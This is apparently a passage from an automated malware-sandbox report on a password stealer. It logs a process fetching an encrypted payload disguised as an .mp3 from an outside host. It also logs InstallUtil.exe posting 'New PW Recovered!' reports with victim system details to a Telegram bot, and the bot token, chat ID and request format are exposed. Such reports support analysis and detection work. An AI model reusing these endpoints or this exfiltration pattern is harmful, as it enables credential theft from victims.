                                          2024-10-04 04:22:04 UTC8000INData Raw: 85 cd af 3f d1 9d 9b d7 ce 37 ab 6c 36 8b 8b 7a 39 13 59 9e d9 1b 56 be e0 fe 5e 48 61 ab 99 cf f8 8f 48 b8 85 51 b9 a5 c7 61 3a ed 24 fe 02 58 3f 8e ee 9c 4d d0 60 34 2f 6b 4c b7 ec e2 32 49 fc 11 b0 19 c9 af b2 30 b7 1e 68 f3 b1 78 26 4f 9a c2 21 64 36 cc b0 f5 e1 bf 93 3b f2 88 53 3f 9f ff 52 57 3f ca d3 bf a3 01 a0 5a 4f 46 8f c5 a1 5d 92 33 99 ad c2 af 49 68 e3 64 86 95 84 12 4d 65 b2 0e 32 40 a9 5c a4 51 0a 6e 34 e3 87 ff 31 41 b9 38 fa 0b c4 3f 42 c7 f9 e0 43 30 6b f3 8d 70 a3 4c 17 36 a6 e1 cd bb ae b8 af 5a c7 31 cf aa 48 9f d3 5c f3 76 73 88 18 f4 48 0f 10 1c 7b 06 03 b0 65 25 a2 3b 1c fe 34 4f 73 aa 57 5d 5a ff 2c b0 d0 c3 8f d2 4e 99 67 e3 8c 62 4a 9b c2 bf 2c 7b 11 d9 75 22 5f de 22 b3 14 77 71 33 8f a6 0a a5 c3 b8 ef 3a 35 41 c0 3e 46 2f 7e
                                          Data Ascii: ?7l6z9YV^HaHQa:$X?M`4/kL2I0hx&O!d6;S?RW?ZOF]3IhdMe2@\Qn41A8?BC0kpL6Z1H\vsH{e%;4OsW]Z,NgbJ,{u"_"wq3:5A>F/~
                                          2024-10-04 04:22:04 UTC8000INData Raw: 11 05 8a 68 77 e7 d3 eb fd f7 a7 d8 40 11 f4 15 6d e0 3d 44 49 b5 38 3a d8 92 58 bf 22 29 c8 39 4c cc df 88 91 bf 0a 7d 71 ba 33 1d 2d 99 43 fc 32 15 58 0e fe 66 0e 56 55 10 37 9d 26 0d 8e 6e 7d ee 9e 23 c9 6d 9f 8e 35 f2 94 32 90 07 85 b4 a9 79 b1 12 87 41 07 3b 27 ed 51 37 94 be a4 1a ab 19 55 40 97 64 e8 1f f8 c6 53 36 6c b6 41 55 93 4a 43 b0 8c da ae 2b 1a 6b 01 67 6c 97 83 34 46 00 00 ac a4 93 57 91 51 06 c9 89 60 7c 21 61 6a 70 23 0a 10 73 2e cd 7b ed 1d 92 4b 78 38 a6 9f a9 e1 05 42 bb 7f b0 25 2e 55 8c 66 b1 11 e9 97 43 d1 4a 3d 1e aa 8d f9 6d 52 e8 41 4c 72 96 b5 a3 a8 47 74 3f 59 ea bb 35 cf 10 ac 4b 2a 8c ae bb 4d a6 29 39 b4 9e 0d 4f 50 72 da 17 44 93 9b ab 88 a3 08 f3 e4 34 17 57 ef 1e e7 93 7e 36 e1 de c1 27 bc a9 21 ba e6 2e b7 25 f4 f8 25
                                          Data Ascii: hw@m=DI8:X")9L}q3-C2XfVU7&n}#m52yA;'Q7U@dS6lAUJC+kgl4FWQ`|!ajp#s.{Kx8B%.UfCJ=mRALrGt?Y5K*M)9OPrD4W~6'!.%%
                                          2024-10-04 04:22:04 UTC8000INData Raw: b2 86 07 2a 7e d6 84 d6 21 4b 54 4c 2b 1f 55 c8 55 9b 14 6e 44 85 18 d7 2d a8 69 ba 1a 29 55 d7 a3 c9 ec da 9b 98 d6 5e 6f 41 04 c8 30 3c 9f c7 74 08 69 c7 b9 e0 77 c9 bd 09 14 42 be ba 50 2a 3a 49 e7 72 95 fb be bc b2 01 01 52 1f 6f 6b ee ae 2d ff ab 2a ca 85 2a eb 8c b4 7b df 1f e4 83 4c 38 8c fb cc 83 1a d4 83 ff 8b 30 55 c7 a5 5a 2d a6 d2 77 65 54 e7 3a 25 5c 01 05 ba 0f 19 04 65 93 6a 37 8b 14 c7 d0 9e af 16 ac 77 43 e4 0d 1c 20 50 00 77 3f 84 1f 22 9c c8 64 7d 24 2e 7e 1d 27 f8 06 00 52 c7 58 b8 50 a9 59 f4 e7 d0 7a f5 fd 79 20 2f a7 b3 50 74 8d a9 34 87 e7 10 f9 84 d6 93 79 88 f3 b9 b7 13 20 fc a1 f3 48 13 5c 82 01 ec 82 17 f0 be 89 fe 2c 29 80 86 0d f2 03 e2 d4 37 51 62 86 dd 5d e6 de 7a 81 96 47 fa 9f 51 05 55 cf 81 7d d6 90 f8 f1 26 6a ad 8e 52
                                          Data Ascii: *~!KTL+UUnD-i)U^oA0<tiwBP*:IrRok-**{L80UZ-weT:%\ej7wC Pw?"d}$.~'RXPYzy /Pt4y H\,)7Qb]zGQU}&jR
                                          2024-10-04 04:22:04 UTC8000INData Raw: ef 7f 4d 26 77 12 7c b7 06 b4 cd 76 11 78 b9 07 20 90 50 e6 66 b9 a9 2c ba 9e 0d 40 83 67 c2 f3 9f 13 27 e9 04 90 02 3e ed db ad 30 66 d5 1c bb e6 93 7d 7e f2 6c 5f 87 95 18 7a d7 f2 de 95 cf 2b 97 48 0d b2 9f 06 14 45 1e ca 90 67 b4 45 38 bc 21 df e2 62 2e 31 2d 8f f8 5e 1a 31 30 29 2f 54 c5 4c a5 5d 42 74 d3 6d ba 0c 3d b5 21 f4 29 1d 02 e2 5d 00 a0 b0 6d 68 6d 14 90 80 85 d4 ec 3d a0 5c 83 d4 5d f1 fd 6e d9 da be b3 3b c0 10 b5 a5 04 5d 1b bf 76 04 a9 ee 64 4f bb 8f 98 f4 5a 8d c7 de 8b 44 67 e6 4c ed 89 9a c9 e1 f1 7e b0 4c 94 e4 c2 db 35 24 1e 65 1f b2 2b 84 f1 ca 87 08 c6 f0 c1 f7 98 00 b5 7d e7 15 da 25 6b 67 bc a9 41 f5 66 aa dc c5 cd 38 d7 0f 4c 69 44 f8 9a 44 f3 43 61 2f 40 18 bf 87 bd e8 a2 15 0c 89 05 42 5e ae 71 a2 db 8a d2 3c 2d 5e 68 a3 55
                                          Data Ascii: M&w|vx Pf,@g'>0f}~l_z+HEgE8!b.1-^10)/TL]Btm=!)]mhm=\]n;]vdOZDgL~L5$e+}%kgAf8LiDDCa/@B^q<-^hU
                                          2024-10-04 04:22:04 UTC8000INData Raw: c1 6b ab 8c e4 da 40 ee 40 9d 46 d7 30 da 09 c2 12 e6 b9 26 a0 20 c5 d2 a0 66 89 bd b6 96 a3 e9 f0 9f de e7 b9 14 8e 31 0f f6 64 34 24 97 fc 32 2b 3c 7a c9 52 36 11 9a 88 e8 36 bd 4c d5 c0 09 69 56 43 0f 7e e2 89 ab cd 64 4f 05 bc c3 c8 c1 14 44 88 5d 60 71 6f 86 9d ed 7f 77 44 a9 0b 8a b6 9d 1c 6f 29 b2 b0 d2 3c 8f df a3 a0 f4 da 00 10 c5 e7 ac 81 18 da 64 fb 05 b0 e1 6d 01 8c f9 20 27 e6 a0 f8 00 03 76 d6 ac da 1f 76 12 19 6d 39 ba 6b ab 72 a2 b2 c1 50 f3 40 6c f5 18 32 70 00 49 18 3e 6d 88 d2 67 87 50 c7 d6 59 be 70 c6 69 16 24 47 f4 6f 62 ce 40 b4 3c 48 eb f2 17 f4 78 50 8f 52 6b c3 dc 56 a6 1c 93 a4 2b 28 56 45 30 25 6c a3 7c b6 50 9d cf 88 54 3a 82 58 55 11 0b ee 27 a5 e9 38 d6 45 5b 36 83 ce e0 d8 c2 47 70 ed 58 68 88 c7 f7 d6 c1 de 9b 6d 50 e3 47
                                          Data Ascii: k@@F0& f1d4$2+<zR66LiVC~dOD]`qowDo)<dm 'vvm9krP@l2pI>mgPYpi$Gob@<HxPRkV+(VE0%l|PT:XU'8E[6GpXhmPG


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449731149.154.167.2204434008C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-04 04:22:07 UTC260OUTPOST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=---------------------------8dce40a9347ac6c
                                          Host: api.telegram.org
                                          Content-Length: 915
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          2024-10-04 04:22:07 UTC25INHTTP/1.1 100 Continue
                                          2024-10-04 04:22:07 UTC915OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 30 61 39 33 34 37 61 63 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 37 33 37 31 39 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 30 61 39 33 34 37 61 63 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 34 2f 32 30 32 34 20 30 30 3a 32 32 3a 30 35 0a 55 73 65 72
                                          Data Ascii: -----------------------------8dce40a9347ac6cContent-Disposition: form-data; name="chat_id"1673719962-----------------------------8dce40a9347ac6cContent-Disposition: form-data; name="caption"New PW Recovered!Time: 10/04/2024 00:22:05User
                                          2024-10-04 04:22:07 UTC1031INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Fri, 04 Oct 2024 04:22:07 GMT
                                          Content-Type: application/json
                                          Content-Length: 643
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          {"ok":true,"result":{"message_id":161,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1728015727,"document":{"file_name":"user-648351 2024-10-04 00-22-05.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOhZv9tbzGO7c04pg3RprLbDX06U0wAAmMWAAJIsvlTnNJQkyrVOL82BA","file_unique_id":"AgADYxYAAkiy-VM","file_size":319},"caption":"New PW Recovered!\n\nTime: 10/04/2024 00:22:05\nUser Name: user/648351\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.44973267.212.175.1624436192C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-04 04:22:16 UTC84OUTGET /rigasin/Chody.mp3 HTTP/1.1
                                          Host: wymascensores.com
                                          Connection: Keep-Alive
                                          2024-10-04 04:22:17 UTC209INHTTP/1.1 200 OK
                                          Date: Fri, 04 Oct 2024 04:22:17 GMT
                                          Server: Apache
                                          Last-Modified: Thu, 03 Oct 2024 06:29:50 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 960520
                                          Connection: close
                                          Content-Type: audio/mpeg
                                          2024-10-04 04:22:17 UTC7983INData Raw: 14 1e 1b 18 84 68 0a 32 47 98 96 7b fc 60 fd 01 8b 18 c6 21 e4 e8 12 d9 8a ee ac 02 45 a1 c1 ef 40 05 9a d6 79 68 6a 91 bd 1d f7 4a ca eb 37 21 16 8e 61 d0 c5 23 4b b3 98 33 20 bd 18 07 3c c1 30 3d f0 c6 cc ce 29 b8 8d 98 f9 2e 3e 4d b3 02 a7 76 19 59 01 db 3f d0 0c f5 ce c8 e6 ea c4 cc 03 37 0b 71 7e ec 53 af ed 89 c2 71 f8 ec 97 c6 12 02 3c 33 e4 d2 ae 54 f4 47 e9 3a fa 79 4e 37 b3 0e 19 e7 b9 62 69 1b 2e 19 ce 83 a1 ab c2 c0 f4 ee 2a 0d a8 3c 9d 41 33 8f c2 32 af 34 c5 a5 bd 1c a4 c3 a3 71 79 c0 12 4f 3d ba d7 11 3c 91 b4 28 d7 67 18 59 f9 c9 c2 b4 38 7c 2c 65 22 8e 22 1e 27 9b db fd d5 47 46 38 a7 67 f1 24 36 1b cc a1 b8 b9 c0 18 50 81 28 26 53 6b b0 0f cf 2a 16 47 5c 67 b4 57 45 f8 93 c7 44 62 1a 2e 3e 85 32 48 f4 9a ee bc e1 47 e5 da 3b be ab 55 ff
                                          Data Ascii: h2G{`!E@yhjJ7!a#K3 <0=).>MvY?7q~Sq<3TG:yN7bi.*<A324qyO=<(gY8|,e""'GF8g$6P(&Sk*G\gWEDb.>2HG;U
                                          2024-10-04 04:22:17 UTC8000INData Raw: 86 9b be 33 e5 4f d0 9c 08 49 37 1b 67 ce 55 5d e1 61 36 7c dd fc da e5 99 0d c6 5f eb 1b f9 b7 33 3c 83 ad 8f 34 60 f5 93 75 c3 68 9a fc a4 89 79 67 c1 f8 aa ef 45 91 e2 a5 fc 10 12 b3 5a a6 9e 90 26 b5 36 3a 33 95 82 f6 6a 25 ea 0c eb 79 3c 3d 10 5a 5d 8f 92 b5 b8 50 60 a9 10 0d 01 aa ca 65 a9 01 73 44 a1 71 e1 2c 0d 05 54 29 47 d6 e0 b9 d0 fa da c3 b0 56 e5 10 45 59 ef 30 75 b0 ca 90 42 58 5f 2f 73 e5 3a a4 20 1c 60 b4 31 a3 45 83 7c 3f 3a ce a5 97 4a 93 70 f4 e1 16 38 97 a4 9e 20 30 4a fd 24 60 7f 10 83 40 7c d7 3a 2c b5 06 c6 8b a4 db b5 81 28 d4 84 1f 57 9f c5 a5 04 cd af 8b 2e 1a b5 ae b1 59 b6 e8 fb e0 88 3d 5b 01 67 3b 0c 03 ac b1 80 ee 06 42 1e 26 d4 5f a2 0c 12 41 46 0e 3e 77 9f 0c ab 04 83 2d 96 79 c1 70 e9 99 7b 04 2e 0f ee 05 e7 ef 5c ea af
                                          Data Ascii: 3OI7gU]a6|_3<4`uhygEZ&6:3j%y<=Z]P`esDq,T)GVEY0uBX_/s: `1E|?:Jp8 0J$`@|:,(W.Y=[g;B&_AF>w-yp{.\
                                          2024-10-04 04:22:17 UTC8000INData Raw: d6 14 66 2f f0 a4 81 2e e4 91 47 96 05 71 44 57 1d 8e 3d 1b 2a 66 08 68 1b 9b 9c 6b 6b 47 b7 ea 11 16 fa 33 f8 07 69 d1 3f 51 43 28 d8 de bb 54 9a c5 cd ca 63 62 72 4d 13 32 a2 c9 61 cb 54 42 21 a0 3a a5 9b 55 6a a5 40 d6 15 a7 fc 9f 45 d9 45 5b 7f 54 06 00 e1 51 9d 54 8e e3 45 45 03 3d 14 0f 16 e1 25 59 48 a1 c4 18 b3 b8 ff 70 5a 7b a9 46 73 1a b6 ef 58 4c 27 03 a1 eb 85 0a 4a 6b 58 81 ff e5 53 7b cf 62 dc 33 2a 78 b2 2a 1c 72 e1 f6 37 c9 42 2e 02 7c 20 93 7b 2b 5f 06 16 18 db b2 dc 9d bb a2 69 40 3e 64 41 81 00 aa 75 77 65 04 94 eb 90 aa 83 7f 2a 93 a5 84 5e a3 be 69 f0 f6 f8 ad b6 4f 26 5a 62 98 2a f2 23 3b bb 88 a8 fb 71 fb a5 49 ca 9d a6 c9 c6 dc a2 3b 90 81 a2 e0 75 d8 97 1f 7c 55 22 a5 73 ad 8b 12 2a 63 57 46 1a 34 1a bd 71 03 fb be d3 1b 78 92 58
                                          Data Ascii: f/.GqDW=*fhkkG3i?QC(TcbrM2aTB!:Uj@EE[TQTEE=%YHpZ{FsXL'JkXS{b3*x*r7B.| {+_i@>dAuwe*^iO&Zb*#;qI;u|U"s*cWF4qxX
                                          2024-10-04 04:22:17 UTC8000INData Raw: bd 19 ec f6 16 a0 5b f2 16 bd 32 49 a6 0b 90 5d e5 fc c0 c9 7c 43 1a 7b 93 79 9b 5e 25 cc 93 88 54 9c 33 69 0a 36 a6 b0 fe 92 70 4d 70 7c bc 49 5d 71 df 56 55 b0 42 bf fc 57 b0 26 11 61 16 d4 00 5e 6a 79 fd e6 3f 73 90 66 3a 32 e5 4f 80 13 08 97 6c 71 90 d0 70 e0 2e ee 2d 0e 2d 8f 2b 01 d4 01 63 6d 52 89 c0 50 12 ec b9 62 08 22 bf 3d 66 ad 56 ad 94 69 49 33 09 cb ac e3 44 27 14 21 5e b2 d0 18 09 2b e6 39 c9 f6 c6 d5 c3 22 81 bd c8 db ad 00 27 73 9a c6 2a a4 d8 64 7f 6c da 04 c6 69 33 f5 f4 50 c6 21 07 19 18 dc 52 b7 f2 a6 48 ba 68 a4 e5 84 5c be 86 14 eb d6 ff d9 6e 1b 6f 93 4f f9 8a ff ac f7 38 01 eb ac 2a e3 f7 fa 63 a0 67 4f 05 2a c9 83 58 01 b2 88 d4 67 e8 33 d0 68 78 f3 19 e6 95 0d 78 fe b4 93 c9 ac 13 49 0a 97 88 9c 9e 27 95 e2 1c 6c d8 78 98 5d 91
                                          Data Ascii: [2I]|C{y^%T3i6pMp|I]qVUBW&a^jy?sf:2Olqp.--+cmRPb"=fViI3D'!^+9"'s*dli3P!RHh\noO8*cgO*Xg3hxxI'lx]
                                          2024-10-04 04:22:17 UTC8000INData Raw: 39 cf 98 34 49 f0 56 e8 ae c9 1d 87 8d 3f 93 7c 5b dc cf bf ee 5c 48 37 66 78 5d 23 5d 91 41 b0 b8 9f 79 4a ed a9 0b 90 8d 0d fd 04 5b a0 2e ae 7c 81 21 fc d1 57 f5 b9 d5 54 d2 eb 21 67 b1 a4 6d d8 b2 21 e4 49 3b 0a 7e f0 0e 51 e9 0e 2a b0 38 63 30 b5 72 57 e3 ad 11 69 75 e3 8f da 7b 84 0f d4 76 c0 fe 26 af ff 14 2a a5 ce 0a 06 e1 e7 15 27 8f 95 4f b7 7f 4b 04 c0 a9 4b ef 69 4c 19 8f 03 23 b1 c1 fe 58 07 93 03 65 7e 63 e3 1f ef b5 18 5c c6 c4 84 bf b4 32 69 99 46 12 33 5f 62 35 c8 37 32 4a 28 11 0e 0e cc bd b5 4b b7 91 2e 8f 72 52 c6 dc d7 f7 e3 0a c6 e7 30 85 21 ab d1 c7 80 0d 7a 3e f3 fe b6 8d 5d 23 d9 a2 16 27 2c 32 c5 4d 82 1d e6 5b d4 4b ac 34 a4 5a 4b e5 11 47 bc 90 df f4 3a a5 08 0b 58 36 47 db 96 dd 5a be 5e 85 b3 15 78 6d 98 14 99 4e 37 74 56 15
                                          Data Ascii: 94IV?|[\H7fx]#]AyJ[.|!WT!gm!I;~Q*8c0rWiu{v&*'OKKiL#Xe~c\2iF3_b572J(K.rR0!z>]#',2M[K4ZKG:X6GZ^xmN7tV
                                          2024-10-04 04:22:17 UTC8000INData Raw: 85 cd af 3f d1 9d 9b d7 ce 37 ab 6c 36 8b 8b 7a 39 13 59 9e d9 1b 56 be e0 fe 5e 48 61 ab 99 cf f8 8f 48 b8 85 51 b9 a5 c7 61 3a ed 24 fe 02 58 3f 8e ee 9c 4d d0 60 34 2f 6b 4c b7 ec e2 32 49 fc 11 b0 19 c9 af b2 30 b7 1e 68 f3 b1 78 26 4f 9a c2 21 64 36 cc b0 f5 e1 bf 93 3b f2 88 53 3f 9f ff 52 57 3f ca d3 bf a3 01 a0 5a 4f 46 8f c5 a1 5d 92 33 99 ad c2 af 49 68 e3 64 86 95 84 12 4d 65 b2 0e 32 40 a9 5c a4 51 0a 6e 34 e3 87 ff 31 41 b9 38 fa 0b c4 3f 42 c7 f9 e0 43 30 6b f3 8d 70 a3 4c 17 36 a6 e1 cd bb ae b8 af 5a c7 31 cf aa 48 9f d3 5c f3 76 73 88 18 f4 48 0f 10 1c 7b 06 03 b0 65 25 a2 3b 1c fe 34 4f 73 aa 57 5d 5a ff 2c b0 d0 c3 8f d2 4e 99 67 e3 8c 62 4a 9b c2 bf 2c 7b 11 d9 75 22 5f de 22 b3 14 77 71 33 8f a6 0a a5 c3 b8 ef 3a 35 41 c0 3e 46 2f 7e
                                          Data Ascii: ?7l6z9YV^HaHQa:$X?M`4/kL2I0hx&O!d6;S?RW?ZOF]3IhdMe2@\Qn41A8?BC0kpL6Z1H\vsH{e%;4OsW]Z,NgbJ,{u"_"wq3:5A>F/~
                                          2024-10-04 04:22:17 UTC8000INData Raw: 11 05 8a 68 77 e7 d3 eb fd f7 a7 d8 40 11 f4 15 6d e0 3d 44 49 b5 38 3a d8 92 58 bf 22 29 c8 39 4c cc df 88 91 bf 0a 7d 71 ba 33 1d 2d 99 43 fc 32 15 58 0e fe 66 0e 56 55 10 37 9d 26 0d 8e 6e 7d ee 9e 23 c9 6d 9f 8e 35 f2 94 32 90 07 85 b4 a9 79 b1 12 87 41 07 3b 27 ed 51 37 94 be a4 1a ab 19 55 40 97 64 e8 1f f8 c6 53 36 6c b6 41 55 93 4a 43 b0 8c da ae 2b 1a 6b 01 67 6c 97 83 34 46 00 00 ac a4 93 57 91 51 06 c9 89 60 7c 21 61 6a 70 23 0a 10 73 2e cd 7b ed 1d 92 4b 78 38 a6 9f a9 e1 05 42 bb 7f b0 25 2e 55 8c 66 b1 11 e9 97 43 d1 4a 3d 1e aa 8d f9 6d 52 e8 41 4c 72 96 b5 a3 a8 47 74 3f 59 ea bb 35 cf 10 ac 4b 2a 8c ae bb 4d a6 29 39 b4 9e 0d 4f 50 72 da 17 44 93 9b ab 88 a3 08 f3 e4 34 17 57 ef 1e e7 93 7e 36 e1 de c1 27 bc a9 21 ba e6 2e b7 25 f4 f8 25
                                          Data Ascii: hw@m=DI8:X")9L}q3-C2XfVU7&n}#m52yA;'Q7U@dS6lAUJC+kgl4FWQ`|!ajp#s.{Kx8B%.UfCJ=mRALrGt?Y5K*M)9OPrD4W~6'!.%%
                                          2024-10-04 04:22:17 UTC8000INData Raw: b2 86 07 2a 7e d6 84 d6 21 4b 54 4c 2b 1f 55 c8 55 9b 14 6e 44 85 18 d7 2d a8 69 ba 1a 29 55 d7 a3 c9 ec da 9b 98 d6 5e 6f 41 04 c8 30 3c 9f c7 74 08 69 c7 b9 e0 77 c9 bd 09 14 42 be ba 50 2a 3a 49 e7 72 95 fb be bc b2 01 01 52 1f 6f 6b ee ae 2d ff ab 2a ca 85 2a eb 8c b4 7b df 1f e4 83 4c 38 8c fb cc 83 1a d4 83 ff 8b 30 55 c7 a5 5a 2d a6 d2 77 65 54 e7 3a 25 5c 01 05 ba 0f 19 04 65 93 6a 37 8b 14 c7 d0 9e af 16 ac 77 43 e4 0d 1c 20 50 00 77 3f 84 1f 22 9c c8 64 7d 24 2e 7e 1d 27 f8 06 00 52 c7 58 b8 50 a9 59 f4 e7 d0 7a f5 fd 79 20 2f a7 b3 50 74 8d a9 34 87 e7 10 f9 84 d6 93 79 88 f3 b9 b7 13 20 fc a1 f3 48 13 5c 82 01 ec 82 17 f0 be 89 fe 2c 29 80 86 0d f2 03 e2 d4 37 51 62 86 dd 5d e6 de 7a 81 96 47 fa 9f 51 05 55 cf 81 7d d6 90 f8 f1 26 6a ad 8e 52
                                          Data Ascii: *~!KTL+UUnD-i)U^oA0<tiwBP*:IrRok-**{L80UZ-weT:%\ej7wC Pw?"d}$.~'RXPYzy /Pt4y H\,)7Qb]zGQU}&jR
                                          2024-10-04 04:22:17 UTC8000INData Raw: ef 7f 4d 26 77 12 7c b7 06 b4 cd 76 11 78 b9 07 20 90 50 e6 66 b9 a9 2c ba 9e 0d 40 83 67 c2 f3 9f 13 27 e9 04 90 02 3e ed db ad 30 66 d5 1c bb e6 93 7d 7e f2 6c 5f 87 95 18 7a d7 f2 de 95 cf 2b 97 48 0d b2 9f 06 14 45 1e ca 90 67 b4 45 38 bc 21 df e2 62 2e 31 2d 8f f8 5e 1a 31 30 29 2f 54 c5 4c a5 5d 42 74 d3 6d ba 0c 3d b5 21 f4 29 1d 02 e2 5d 00 a0 b0 6d 68 6d 14 90 80 85 d4 ec 3d a0 5c 83 d4 5d f1 fd 6e d9 da be b3 3b c0 10 b5 a5 04 5d 1b bf 76 04 a9 ee 64 4f bb 8f 98 f4 5a 8d c7 de 8b 44 67 e6 4c ed 89 9a c9 e1 f1 7e b0 4c 94 e4 c2 db 35 24 1e 65 1f b2 2b 84 f1 ca 87 08 c6 f0 c1 f7 98 00 b5 7d e7 15 da 25 6b 67 bc a9 41 f5 66 aa dc c5 cd 38 d7 0f 4c 69 44 f8 9a 44 f3 43 61 2f 40 18 bf 87 bd e8 a2 15 0c 89 05 42 5e ae 71 a2 db 8a d2 3c 2d 5e 68 a3 55
                                          Data Ascii: M&w|vx Pf,@g'>0f}~l_z+HEgE8!b.1-^10)/TL]Btm=!)]mhm=\]n;]vdOZDgL~L5$e+}%kgAf8LiDDCa/@B^q<-^hU
                                          2024-10-04 04:22:17 UTC8000INData Raw: c1 6b ab 8c e4 da 40 ee 40 9d 46 d7 30 da 09 c2 12 e6 b9 26 a0 20 c5 d2 a0 66 89 bd b6 96 a3 e9 f0 9f de e7 b9 14 8e 31 0f f6 64 34 24 97 fc 32 2b 3c 7a c9 52 36 11 9a 88 e8 36 bd 4c d5 c0 09 69 56 43 0f 7e e2 89 ab cd 64 4f 05 bc c3 c8 c1 14 44 88 5d 60 71 6f 86 9d ed 7f 77 44 a9 0b 8a b6 9d 1c 6f 29 b2 b0 d2 3c 8f df a3 a0 f4 da 00 10 c5 e7 ac 81 18 da 64 fb 05 b0 e1 6d 01 8c f9 20 27 e6 a0 f8 00 03 76 d6 ac da 1f 76 12 19 6d 39 ba 6b ab 72 a2 b2 c1 50 f3 40 6c f5 18 32 70 00 49 18 3e 6d 88 d2 67 87 50 c7 d6 59 be 70 c6 69 16 24 47 f4 6f 62 ce 40 b4 3c 48 eb f2 17 f4 78 50 8f 52 6b c3 dc 56 a6 1c 93 a4 2b 28 56 45 30 25 6c a3 7c b6 50 9d cf 88 54 3a 82 58 55 11 0b ee 27 a5 e9 38 d6 45 5b 36 83 ce e0 d8 c2 47 70 ed 58 68 88 c7 f7 d6 c1 de 9b 6d 50 e3 47
                                          Data Ascii: k@@F0& f1d4$2+<zR66LiVC~dOD]`qowDo)<dm 'vvm9krP@l2pI>mgPYpi$Gob@<HxPRkV+(VE0%l|PT:XU'8E[6GpXhmPG


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.449734149.154.167.220443344C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-04 04:22:20 UTC260OUTPOST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=---------------------------8dce40a9b442453
                                          Host: api.telegram.org
                                          Content-Length: 915
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          2024-10-04 04:22:20 UTC25INHTTP/1.1 100 Continue
                                          2024-10-04 04:22:20 UTC915OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 30 61 39 62 34 34 32 34 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 37 33 37 31 39 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 30 61 39 62 34 34 32 34 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 34 2f 32 30 32 34 20 30 30 3a 32 32 3a 31 38 0a 55 73 65 72
                                          Data Ascii: -----------------------------8dce40a9b442453Content-Disposition: form-data; name="chat_id"1673719962-----------------------------8dce40a9b442453Content-Disposition: form-data; name="caption"New PW Recovered!Time: 10/04/2024 00:22:18User
                                          2024-10-04 04:22:21 UTC1031INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Fri, 04 Oct 2024 04:22:21 GMT
                                          Content-Type: application/json
                                          Content-Length: 643
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
